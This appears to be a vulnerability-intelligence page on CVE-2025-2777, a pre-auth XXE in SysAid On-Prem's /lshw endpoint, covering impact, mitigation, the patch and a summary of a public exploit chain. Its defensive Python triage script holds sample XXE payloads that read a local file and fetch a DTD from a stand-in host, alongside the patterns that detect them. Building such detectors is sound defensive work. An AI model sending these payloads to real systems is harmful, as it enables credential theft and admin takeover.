Severity: Critical · Public exploit available

Unauthenticated XXE in SysAid On-Prem lshw Processing

Identifiers: CVE-2025-2777 · CWE-611 (Improper Restriction of XML…)

CVE-2025-2777 is an unauthenticated XML External Entity (XXE) vulnerability affecting SysAid On-Prem versions 23.3.40 and earlier. The flaw is in the lshw processing functionality, including the /lshw endpoint, where attacker-supplied XML is parsed unsafely. A remote, unauthenticated attacker can send a crafted HTTP POST request containing malicious XML entities and cause the application to resolve external entities or read local resources. According to the provided reporting, this issue is one of several pre-auth XXE flaws in SysAid that stem from the same underlying XML parsing weakness. Successful exploitation provides a file-read primitive, including access to an installation-created file containing the main administrator's clear-text password, and thereby enables administrator account takeover. The broader reporting also notes that XXE in this product family may enable SSRF behavior and, when chained with CVE-2025-2778 (or, in some reporting, CVE-2024-36394), may contribute to full remote code execution; CVE-2025-2777 itself, however, is specifically described here as an XXE leading to file disclosure and admin takeover.


ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation allows an unauthenticated remote attacker to read files accessible to the SysAid application and obtain sensitive data sufficient for administrator account takeover. The disclosed impact includes arbitrary file-read primitives and recovery of the main administrator's clear-text password from an installation-created file. This can lead to full compromise of the SysAid application, exposure of internal configuration and secrets, and potentially SSRF-style access to internal resources via XML entity resolution. While the provided content indicates that full unauthenticated RCE may be achievable when this flaw is chained with a separate command injection vulnerability, that RCE outcome is not the direct standalone impact attributed to CVE-2025-2777 itself.

Mitigation

If you can’t patch tonight, do this now.

If immediate patching is not possible, reduce exposure by restricting or removing internet access to SysAid On-Prem, especially the vulnerable lshw functionality and related pre-auth endpoints. Limit access to trusted administrative networks or VPN-only paths, monitor for crafted XML POST requests to /lshw and related endpoints, and inspect for outbound DNS/HTTP callbacks indicative of XXE/OAST activity. Review SysAid administrator credentials and rotate them if compromise is suspected, particularly because the vulnerability may expose clear-text admin credentials. Also review logs and network telemetry for signs of file disclosure, SSRF, or follow-on exploitation attempts.
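As an added defender-side example (not code from this page, from SysAid, or from watchTowr), the Python triage script below implements the two monitoring points in the paragraph above: it flags POST bodies to /lshw that declare a DTD with external SYSTEM/PUBLIC identifiers or parameter entities, and it correlates any host named in such a declaration with outbound DNS/HTTP events from the application host, which is what an XXE/OAST callback looks like from the inside. The log records are constructed; the record field names, the `oast.example` host and the `PLACEHOLDER` path are assumptions, not SysAid's log format or real indicators.

```python
"""Triage inbound XML POSTs for XXE indicators and correlate named hosts with
egress telemetry. Added example; all records below are constructed."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Pre-auth XML-accepting path named on the page; extend from the vendor advisory.
WATCHED_PATHS = ("/lshw",)

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
ENTITY_RE = re.compile(r"<!ENTITY\b", re.I)
PARAM_ENTITY_RE = re.compile(r"<!ENTITY\s+%", re.I)
# SYSTEM "uri"  or  PUBLIC "pubid" "uri": the URI is the last quoted literal.
EXTERNAL_ID_RE = re.compile(r'\b(?:SYSTEM\s+"([^"]*)"|PUBLIC\s+"[^"]*"\s+"([^"]*)")', re.I)


@dataclass
class Finding:
    path: str
    severity: str                      # "none" | "medium" | "high"
    watched: bool = False              # request hit a known pre-auth XML path
    indicators: list = field(default_factory=list)
    external_uris: list = field(default_factory=list)

    @property
    def callback_hosts(self):
        """Hosts the server would contact if it resolved the external entity.
        file: URIs have no host and are a local file-read attempt instead."""
        hosts = []
        for uri in self.external_uris:
            parts = urlsplit(uri)
            if parts.scheme.lower() in ("http", "https", "ftp") and parts.hostname:
                hosts.append(parts.hostname.lower())
        return hosts


def inspect_request(method: str, path: str, body: str) -> Finding:
    """Classify one inbound request. A well-formed lshw document needs no
    DOCTYPE at all, so any DTD on this path is suspicious; an external
    identifier (SYSTEM/PUBLIC) is what gives XXE its reach."""
    finding = Finding(path=path, severity="none", watched=path in WATCHED_PATHS)
    if method.upper() != "POST" or not body:
        return finding
    if DOCTYPE_RE.search(body):
        finding.indicators.append("doctype")
    if ENTITY_RE.search(body):
        finding.indicators.append("entity_decl")
    if PARAM_ENTITY_RE.search(body):
        finding.indicators.append("parameter_entity")
    for m in EXTERNAL_ID_RE.finditer(body):
        finding.external_uris.append(m.group(1) or m.group(2))
    if finding.external_uris:
        finding.indicators.append("external_identifier")
        finding.severity = "high"
    elif finding.indicators:
        # Internal-only entities cannot reach files or the network, but a DTD
        # on an unauthenticated endpoint still deserves a look.
        finding.severity = "medium"
    return finding


def correlate_egress(findings, egress_events):
    """Return hosts that were both named in an inbound DTD and then seen in the
    application host's outbound DNS/HTTP events: evidence the entity resolved."""
    wanted = {h for f in findings for h in f.callback_hosts}
    return sorted({ev["dest"].lower() for ev in egress_events if ev["dest"].lower() in wanted})


# Constructed reverse-proxy records (field names are assumptions).
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/lshw",
     "body": '<?xml version="1.0"?><list><node id="srv01" class="system">'
             '<description>Computer</description></node></list>'},
    {"method": "POST", "path": "/lshw",
     "body": '<?xml version="1.0"?><!DOCTYPE list [<!ENTITY leak SYSTEM '
             '"file:///PLACEHOLDER/install-created-file">]><list>&leak;</list>'},
    {"method": "POST", "path": "/lshw",
     "body": '<?xml version="1.0"?><!DOCTYPE list [<!ENTITY % dtd SYSTEM '
             '"http://oast.example/x.dtd"> %dtd;]><list/>'},
    {"method": "GET", "path": "/lshw", "body": ""},
    {"method": "POST", "path": "/api/other",
     "body": '<!DOCTYPE note [<!ENTITY co "Example Corp">]><note>&co;</note>'},
]

# Constructed egress events from the SysAid host (DNS resolver / proxy logs).
SAMPLE_EGRESS = [
    {"src": "sysaid-host", "dest": "update.vendor.example", "kind": "dns"},
    {"src": "sysaid-host", "dest": "oast.example", "kind": "dns"},
]


def triage(requests=SAMPLE_REQUESTS, egress=SAMPLE_EGRESS):
    """Run both checks; returns (alerts, confirmed callback hosts)."""
    findings = [inspect_request(r["method"], r["path"], r["body"]) for r in requests]
    alerts = [f for f in findings if f.severity != "none"]
    return alerts, correlate_egress(alerts, egress)


if __name__ == "__main__":
    alerts, callbacks = triage()
    for f in alerts:
        print(f"{f.severity.upper():6} {f.path:12} watched={f.watched} "
              f"{','.join(f.indicators)} {f.external_uris}")
    print("confirmed callbacks:", callbacks)
```

On the constructed input the benign lshw document and the GET produce nothing, the two DTD-bearing posts to /lshw are rated high, and the internal-entity post elsewhere is medium; only `oast.example` survives correlation because it appears both in an inbound SYSTEM literal and in the host's egress log, which is the signal that the parser actually resolved the entity rather than rejecting the request. A `file:` URI yields no callback host, so that case has to be judged from the inbound side and from whether the response body or size changed.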

Remediation

Patch, then assume compromise.

Upgrade SysAid On-Prem to a fixed release. The provided content states that SysAid addressed CVE-2025-2777 in version 24.4.60 build 16, released in early March 2025. Affected versions are 23.3.40 and earlier. Apply the vendor update through normal change-management and testing procedures, and ensure all internet-exposed SysAid On-Prem instances are brought to 24.4.60 build 16 or later.
PUBLIC EXPLOITS

Exploits

1 valid exploit after Mallory filtered fakes, detection scripts, and README-only repos.

watchTowr-vs-SysAid-PreAuth-RCE-Chain · Maturity: PoC · Verified exploit

This repository contains a Python proof-of-concept exploit for a pre-authentication remote code execution (RCE) chain affecting SysAid Server (versions <= 23.3.40), targeting CVE-2025-2775 through CVE-2025-2778. The exploit leverages a chained attack: it first uses an XXE vulnerability to leak admin credentials from a file on the target server, then logs in as the admin, and finally abuses a command injection flaw in the 'javaLocation' parameter of API.jsp to execute arbitrary commands supplied by the attacker. The exploit requires the attacker to run a local HTTP server (on port 80) to serve a malicious DTD and receive exfiltrated data. The main code file, 'watchTowr-vs-SysAid-PreAuth-RCE-Chain.py', is the entry point and orchestrates the entire attack chain. The README provides usage instructions, affected versions, and references. The exploit is a functional PoC and demonstrates full compromise of the target system if successful.

watchtowrlabs · Disclosed Mar 28, 2025 · python · network
EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

Vendor    Product               Type
Sysaid    Sysaid                application
Sysaid    Sysaid On-Premises    application

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
